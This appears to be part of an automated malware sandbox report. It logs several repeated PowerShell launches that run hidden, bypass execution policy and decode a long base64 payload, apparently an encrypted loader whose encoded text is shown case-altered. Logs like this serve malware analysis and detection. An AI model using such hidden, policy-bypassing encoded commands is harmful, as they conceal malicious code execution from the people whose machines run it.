9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrwbmvpyz1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcrkznpxzswgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkcg5lawmuq29wevrvkcroanbkdyk7csrwbmvpyy5eaxnwb3nlkck7csrkznpxzs5eaxnwb3nlkck7csroanbkdy5eaxnwb3nlkck7csroanbkdy5ub0fycmf5kck7fwz1bmn0aw9uihfoagzvkcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr4dnhhdj1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgruzm9spsr4dnhhdi5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrkbmzvbc5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jghizia9icrlbny6vvnfuk5btuu7jgz5cmj1id0gj0m6xfvzzxjzxccgkyakagjmicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakznlyynu7jhblcgv2pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibzzxjqdygkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnmfvvnvczndroelvpzu8xm3rowmjtmevft3f2v2tvvjffv3r1vc9pagppvt0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnb0nbvejislvmswnpq1rkqwt1tgwxzz09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbiblymlidcgkcgfyyw1fdmfykxsjsuvyicckzgz6cwu9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckagpwzhc9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrwbmvpyz1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcrkznpxzswgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkcg5lawmuq29wevrvkcroanbkdyk7csrwbmvpyy5eaxnwb3nlkck7csrkznpxzs5eaxnwb3nlkck7csroanbkdy5eaxnwb3nlkck7csroanbkdy5ub0fycmf5kck7fwz1bmn0aw9uihfoagzvkcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr4dnhhdj1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgruzm9spsr4dnhhdi5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrkbmzvbc5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jghizia9icrlbny6vvnfuk5btuu7jgz5cmj1id0gj0m6xfvzzxjzxccgkyakagjmicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakznlyynu7jhblcgv2pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibzzxjqdygkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnmfvvnvczndroelvpzu8xm3rowmjtmevft3f2v2tvvjffv3r1vc9pagppvt0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnb0nbvejislvmswnpq1rkqwt1tgwxzz09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbiblymlidcgkcgfyyw1fdmfykxsjsuvyicckzgz6cwu9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckagpwzhc9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrwbmvpyz1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcrkznpxzswgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkcg5lawmuq29wevrvkcroanbkdyk7csrwbmvpyy5eaxnwb3nlkck7csrkznpxzs5eaxnwb3nlkck7csroanbkdy5eaxnwb3nlkck7csroanbkdy5ub0fycmf5kck7fwz1bmn0aw9uihfoagzvkcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr4dnhhdj1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgruzm9spsr4dnhhdi5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrkbmzvbc5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jghizia9icrlbny6vvnfuk5btuu7jgz5cmj1id0gj0m6xfvzzxjzxccgkyakagjmicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakznlyynu7jhblcgv2pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibzzxjqdygkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnmfvvnvczndroelvpzu8xm3rowmjtmevft3f2v2tvvjffv3r1vc9pagppvt0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnb0nbvejislvmswnpq1rkqwt1tgwxzz09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbiblymlidcgkcgfyyw1fdmfykxsjsuvyicckzgz6cwu9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckagpwzhc9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrwbmvpyz1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcrkznpxzswgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkcg5lawmuq29wevrvkcroanbkdyk7csrwbmvpyy5eaxnwb3nlkck7csrkznpxzs5eaxnwb3nlkck7csroanbkdy5eaxnwb3nlkck7csroanbkdy5ub0fycmf5kck7fwz1bmn0aw9uihfoagzvkcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr4dnhhdj1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgruzm9spsr4dnhhdi5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrkbmzvbc5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jghizia9icrlbny6vvnfuk5btuu7jgz5cmj1id0gj0m6xfvzzxjzxccgkyakagjmicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakznlyynu7jhblcgv2pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibzzxjqdygkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnmfvvnvczndroelvpzu8xm3rowmjtmevft3f2v2tvvjffv3r1vc9pagppvt0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnb0nbvejislvmswnpq1rkqwt1tgwxzz09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbiblymlidcgkcgfyyw1fdmfykxsjsuvyicckzgz6cwu9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckagpwzhc9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrwbmvpyz1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcrkznpxzswgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkcg5lawmuq29wevrvkcroanbkdyk7csrwbmvpyy5eaxnwb3nlkck7csrkznpxzs5eaxnwb3nlkck7csroanbkdy5eaxnwb3nlkck7csroanbkdy5ub0fycmf5kck7fwz1bmn0aw9uihfoagzvkcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr4dnhhdj1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgruzm9spsr4dnhhdi5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrkbmzvbc5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jghizia9icrlbny6vvnfuk5btuu7jgz5cmj1id0gj0m6xfvzzxjzxccgkyakagjmicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakznlyynu7jhblcgv2pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('awv4icgoawv4icgoj2lnsunst1nprlrtrvjwsunfvvbeqvrfu3dyic1nsunst1nprlrtrvjwsunfvvbeqvrfu1vzzujnsunst1nprlrtrvjwsunfvvbeqvrfu2fzawnqtulduk9tt0zuu0vsvkldrvvqrefurvnhcnnpbmcgik1jq1jpu09gvfnfulzjq0vvuerbvevtae1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtde1jq1jpu09gvfnfulzjq0vvuerbvevtce1jq1jpu09gvfnfulzjq0vvuerbvevtc01jq1jpu09gvfnfulzjq0vvuerbvevtoi8vmhhnsunst1nprlrtrvjwsunfvvbeqvrfuzauc3qvtulduk9tt0zuu0vsvkldrvvqrefurvm4s01jq1jpu09gvfnfulzjq0vvuerbvevtdvyuchmxiicplljlcgxhy2uoj01jq1jpu09gvfnfulzjq0vvuerbvevtjywnjykpks5db250zw50kttmdw5jdglvbibzzxjqdygkcgfyyw1fdmfykxsjjgflc192yxi9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuqwvzxto6q3jlyxrlkck7csrhzxnfdmfylk1vzgu9w1n5c3rlbs5tzwn1cml0es5dcnlwdg9ncmfwahkuq2lwagvytw9kzv06okncqzsjjgflc192yxiuugfkzgluzz1bu3lzdgvtllnly3vyaxr5lknyexb0b2dyyxboes5qywrkaw5ntw9kzv06olblq1m3owkkywvzx3zhci5lzxk9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnmfvvnvczndroelvpzu8xm3rowmjtmevft3f2v2tvvjffv3r1vc9pagppvt0nktsjjgflc192yxiusvy9w1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygnb0nbvejislvmswnpq1rkqwt1tgwxzz09jyk7csrkzwnyexb0b3jfdmfypsrhzxnfdmfylknyzwf0zurly3j5chrvcigpowkkcmv0dxjux3zhcj0kzgvjcnlwdg9yx3zhci5ucmfuc2zvcm1gaw5hbejsb2nrkcrwyxjhbv92yxisidasicrwyxjhbv92yxiutgvuz3roktsjjgrly3j5chrvcl92yxiurglzcg9zzsgpowkkywvzx3zhci5eaxnwb3nlkck7csryzxr1cm5fdmfyo31mdw5jdglvbiblymlidcgkcgfyyw1fdmfykxsjsuvyicckzgz6cwu9tmv3lu9iamvjdcbtexn0zw0usu8utufcq2vtqujdb3jbqkn5u0fcq3ryqujdzwfbqkntkcwkcgfyyw1fdmfyktsnlljlcgxhy2uoj0fcqycsiccnktsjsuvyicckagpwzhc9tmv3lu9iamvjdcbtexn0zw0usu8uqujdtufcq2vbqkntqujdb0fcq3jbqkn5qujdu0fcq3rbqknyqujdzufcq2fbqkntqujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrwbmvpyz1ozxctt2jqzwn0ifn5c3rlbs5jty5dqujdb21bqknwckfcq2vbqknzc0fcq2lvqujdbi5bqknhwkfcq2lwqujdu3rbqknyzufcq2ftqujdkcrkznpxzswgw0lplknbqknvbufcq3byqujdzxnbqknzaufcq29uqujdlknvqujdbxbbqknyzufcq3nzqujdaufcq29bqknuqujdtw9kzv06okrbqknlqujdy0fcq29tcefcq3jlqujdc3mpoycuumvwbgfjzsgnqujdjywgjycpowkkcg5lawmuq29wevrvkcroanbkdyk7csrwbmvpyy5eaxnwb3nlkck7csrkznpxzs5eaxnwb3nlkck7csroanbkdy5eaxnwb3nlkck7csroanbkdy5ub0fycmf5kck7fwz1bmn0aw9uihfoagzvkcrwyxjhbv92yxisjhbhcmftml92yxipewljrvggjyr4dnhhdj1bu3lzdgvtlljbqknlqujdzmxbqknly3rbqknpb0fcq24uqujdqxnbqknzzufcq21iqujdbefcq3lbqkndojpmqujdb0fcq2fbqknkqujdkftiexrlw11djhbhcmftx3zhcik7jy5szxbsywnlkcdbqkmnlcanjyk7culfwcanjgruzm9spsr4dnhhdi5bqknfqujdbkfcq3rbqknyqujdeufcq1bbqknvqujdaufcq25bqkn0qujdoycuumvwbgfjzsgnqujdjywgjycpowljrvggjyrkbmzvbc5bqknjqujdbkfcq3zbqknvqujda0fcq2vbqkmojg51bgwsicrwyxjhbtjfdmfyktsnlljlcgxhy2uoj0fcqycsiccnktt9jghizia9icrlbny6vvnfuk5btuu7jgz5cmj1id0gj0m6xfvzzxjzxccgkyakagjmicsgj0fcq1xbqknkqujdd0fcq21bqkmuqujdykfcq2fbqkn0qujdjy5szxbsywnlkcdbqkmnlcanjyk7jghvc3quvukuumf3vukuv2luzg93vgl0bgugpsakznlyynu7jhblcgv2pvttexn0zw0usu8urmlszv06oigndhhlvgxsqwrhzvinwy0xli4tmtfdic1qb2luiccnksg
                Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
